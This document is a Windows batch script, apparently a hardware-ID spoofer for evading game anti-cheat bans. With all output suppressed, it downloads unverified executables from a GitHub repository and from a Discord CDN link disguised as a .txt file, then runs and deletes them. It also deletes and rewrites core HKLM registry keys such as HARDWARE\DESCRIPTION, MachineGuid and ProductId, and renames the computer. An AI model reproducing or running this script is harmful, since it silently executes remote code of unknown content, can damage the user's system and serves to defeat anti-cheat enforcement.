Mountvol "x:" /s >Nul 2>&1 & MKDIR "x:\Spoofy" >Nul 2>&1 & CD /D "x:\Spoofy" >Nul 2>&1
curl -s -g -L -o "x.exe" "https://github.com/agr3fox-x64/i9kuk378yj6g-PurpleFoxSpoofy/raw/main/BadwareCleaner.exe$"  >NUL 2>&1
START "" /B /WAIT "x.exe" & DEL /S /Q "x.exe"
curl -s -g -L -o "x.exe" "https://github.com/agr3fox-x64/i9kuk378yj6g-PurpleFoxSpoofy/raw/main/RegCleaner-exe"  >NUL 2>&1
START "" /B /WAIT "x.exe" & DEL /S /Q "x.exe"
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient" /v "MachineId" /t reg_sz /d "{%random%%random%-%random%-%random%-%random%}" /f >NUL 2>&1
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /F >NUL 2>&1
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /F >NUL 2>&1
REG DELETE "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION" /F >NUL 2>&1
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EasyAntiCheat_EOS" /F >NUL 2>&1
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EasyAntiCheat_EOS" /F >NUL 2>&1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f >NUL 2>&1
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d %random%-%random%-%random%-%random% /f>nul 2>&1
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d %random%-%random%-%random%-%random% /f>nul 2>&1
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d {%random%-%random%-%random%-%random%} /f>nul 2>&1
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d {%random%-%random%-%random%-%random%} /f>nul 2>&1
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d {%random%-%random%-%random%-%random%} /f>nul 2>&1W
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f>nul 2>&1
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v InstallDate /t REG_SZ /d %random% /f >NUL 2>&1
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d %random% /f >NUL 2>&1
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f >NUL 2>&1
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d PFS-%random%-%random%-%random%-%random% /f >NUL 2>&1
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d PFS-%random% /f >NUL 2>&1
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d PFS-%random% /f >NUL 2>&1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d PFS-%random% /f >NUL 2>&1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >NUL 2>&1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {PFS-%random%-%random%-%random%-%random%} /f >NUL 2>&1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {PFS-%random%-%random%-%random%-%random%} /f >NUL 2>&1
REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {%random%-%random%-%random%-%random%} /f >NUL 2>&1
REG ADD HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate /t REG_SZ /d %random% /f >NUL 2>&1
REG ADD HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductId /t REG_SZ /d %random% /f >NUL 2>&1
REG ADD HKLM\System\CurrentControlSet\Control\WMI\Security /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d %random% /f >NUL 2>&1
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion" "WindowsUpdate /v SusClientId /t REG_SZ /d {PFS-%random%-%random%-%random%-%random%} /f >NUL 2>&1
START "" /MIN /WAIT POWERSHELL Rename-Computer -NewName "%RANDOM%-PFS-%RANDOM%" >NUL 2>&1
DEL /S /Q "x.exe"
curl -s -g -L -o "x.exe" "https://cdn.discordapp.com/attachments/1206253821861429318/1206279610405228555/EventCleaner-exe.txt?ex=65db6e6e&is=65c8f96e&hm=8492b7336b2cd810e069047a91d54c66ac5c82caf17e9719500fb8c9bfdeb78c&"  >NUL 2>&1
START "" /B /WAIT "x.exe" & DEL /S /Q "x.exe"
CD /D "%SystemDrive%\" & RMDIR /S /Q "x:\Spoofy"
